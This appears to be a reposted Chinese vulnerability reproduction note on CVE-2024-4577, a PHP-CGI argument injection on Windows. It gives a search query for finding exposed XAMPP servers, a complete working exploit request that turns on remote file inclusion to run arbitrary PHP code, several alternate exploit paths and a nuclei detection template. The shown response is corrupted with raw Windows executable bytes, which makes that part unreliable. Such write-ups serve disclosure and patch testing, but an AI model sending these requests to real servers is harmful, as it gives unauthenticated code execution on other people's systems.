免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
01
—
漏洞名称
02
—
漏洞影响
影响范围
03
—
漏洞描述
PHP 在设计时忽略 Windows 中对字符转换的Best-Fit 特性,当PHP运行在Window平台且使用了如下语系(简体中文936/繁体中文950/日文932等)时,攻击者可构造恶意请求绕过CVE-2012-1823 保护,从而可在无需登陆的情况下执行任意PHP代码。
2024年6月6日,PHP官方发布新版本正式修复该漏洞,漏洞利用较为简单且危害较大,建议尽快采取措施升级或者进行缓解。
04
—
header="Xampps_info" || body="/xampps.jpg" || (header="location http" && header="xampp") || body="content="Kai Oswald Seidler" || title="XAMPP for" || title="XAMPP Version" || body="font-size: 1.2em; color: red;">New XAMPP"
05
—
漏洞复现
向靶场发送如下数据包
POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.69Connection: closeContent-Length: 37Accept: */*Accept-Language: enAccept-Encoding: gzipecho md5("CVE-2024-4577");
响应内容如下,包含了md5("CVE-2024-4577")的计算结果
HTTP/1.1 200 OKConnection: closeContent-Type: text/htmlDate: Wed, 12 Jun 2024 07:28:45 GMTServer: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/5.4.19Vary: Accept-EncodingX-Powered-By: PHP/5.4.193f2ba4ab3b260f4c2dc61a6fac7c3e8aMZ����@�� �!�L�!This program cannot be run in DOS mode.$bN�&/j�&/j�&/j��`��//j�/W��"/j�/W��0/j�/W��$/j��� /j�/W��#/j�&/k��/j�/W��$/j�8}��'/j�/W��'/j�Rich&/j�PEL8R�nN�u�@���@����x�@�@��`�@�d.text�ln `.rdata�-�.r@@.data���@�.rsrc@��@@.reloc$��@BV�t�FP���@�N��^�L$�%@�@�D$�HQht�@���@�3��������̋L� ��D$��J��BQP���@��������������U��������jjj�D$������u�3��������������̃����@P�L$Q���@V�T$�@����]����̋D$Qht�@���@�3���������̋D��D$��:u��t�A:Buh@R�D$$��@Vj�D$h�@P�L�@�L$$Q�<�@��D�̋DSUVW�|$��vO�-�@�������@r�@�0�@�� PVjW�Ճ���t�+�uԋD$_^][��P�@�D$+�_^][����������̡��@�T$��L��S�U�l$VW�|$����vVWj���Z��|�@�D���xS�T�@u���L���y1�q|�T���l$�D$�t$����(�@�����u�%P�@��V�t��tj�@X����u^�%P�@^Á���@3ĉ�$��y|����8tm������taPhx�@�L$(hQ��@���@�����T�����j P�,�@����t@P�$�@���D$���>��4������txj P�,�@�����tb���@���T�������+ȃ�|Ejh��@P���@����u0Uh��@�T$(hR��@EU���$�@�l$(���D$���l$�D$PU�Ԃ@���t6�5��@�xvjh��@Q�փ������T$RU� �@���uЋ��@��7�T���R|��@�d;�t����u��I��tQRh��@�D$,hP��@���Rh��@�L$(hQ��@����W�T$$VR�Ӄ��d$�F��ty��v,�jh��@Q���@����u8D$uW�V�WR�D$RP�!�N�WQR��Wjh��@�Ӄ��L$�D$PQ� �@������c���Wjh��@�Ӄ�[��$_^]3̸�[]����������̡��@�T$��L����P+��VW�|$3�;�r�ȋy+����v-S�$U�-x�@��+�P�Qj�Ճ���~�;�r�][_��^�_��^��������U�����Q���@�U��L����P+��S�]V�0W3�;�r�ȋY+����v����+�P�R��L���~�;�r���_^[��]���������̋D$P���@���̡��@�T$��L���V�t��t@�D$��W}����|��L����~ύ��|$WPQ��@ ���;��_��u��@��D$P�D�T�����U�lVW��t�ÍP@��u�+��3��L$�W�<�@������tDO��t'SUhЎ@WV��@V�t�@��U���@��_^]�Uh؎@WV��@V�t�@��U���@��_^]�����������D$@�%��@�̋jh���@ �@�0:����@P�D$$PWR����҃���t�D$$�L$VSPQW���@��_^[������̡@�@SU�-�@V�t$W�|$��D��������tu;�tq��8Xuj�P�Ճ���~^�8^v@�@��L��������H�N���@�F8^�F@�@���D�������tq;�tm��8XufQ�Ճ���~Z�8^vV���@����@�@��T�������P�V���P�V8^�FvQV�`�@��_^][�WV�x�@��=��@u�9����@��t���@��D���h@����W��_^][á�@��V�t$W�|$WV�ы�|�@�L����y�r���@���@��D$P��L���u��8���j@;�t1� h���@ ���@��7���h��@���@����;�tm�P@��u�+���tK�ÍP@��u�+��>�D$@P�|�@�VRSP�D$ �C`�D$ GW�UP�4`�|$@����=�|$�|$$�l$3��-;�t�É$�P��I@��u�+D$���@R����D$Ph��@j�҃�][��t�D$�L$�TWPQRh��@���@�������DP�T�@��_^����@��D���@(��u���@�D�P@��u�W+L$QP�T$R�D$���@���h��@j�у���t�T$�DWVRPh��@���@��_^����@��D��S���tOU�l$���@�����D��V��W�P@��u�+��NQ�<�@V��UW��^�f�7FVWj����OW�@�@�� _^][ËDPht�@�0�@��@P��@��[ËL$Qht�@�0�@��@P�
漏洞复现成功
POC路径有多个
/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input/index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input/test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input/test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
06
—
nuclei poc
nuclei 官方已发布poc,poc文件内容如下
id: CVE-2024-4577info:name: PHP CGI - Argument Injectionauthor: Hüseyin TINTAŞ,sw0rk17,securityforeveryone,pdresearchseverity: criticaldescription: |PHP CGI - Argument Injection (CVE-2024-4577) is a critical argument injection flaw in PHP.impact: |Successful exploitation could lead to remote code execution on the affected system.remediation: |Apply the vendor-supplied patches or upgrade to a non-vulnerable version.metadata:verified: truetags: cve,cve2024,php,cgi,rcehttp:- method: POSTpath:- "{{BaseURL}}/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"- "{{BaseURL}}/index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"- "{{BaseURL}}/test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"- "{{BaseURL}}/test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"body: |<?php echo md5("CVE-2024-4577"); ?>stop-at-first-match: truematchers:- type: wordpart: bodywords:- "3f2ba4ab3b260f4c2dc61a6fac7c3e8a"# digest: 4a0a004730450221008693eaa1040ef5b904550b0ec8d707667e4de37c2f03bcfb4cb631137ed90caf02203b9468a518628678b56886433cd50d65153bb54d66ac540ef0b535407471c01c:922c64590222798bb761d5b6d8e72950
07
—
修复建议
升级到最新版本。
原文始发于微信公众号(AI与网安):CVE-2024-4577 漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论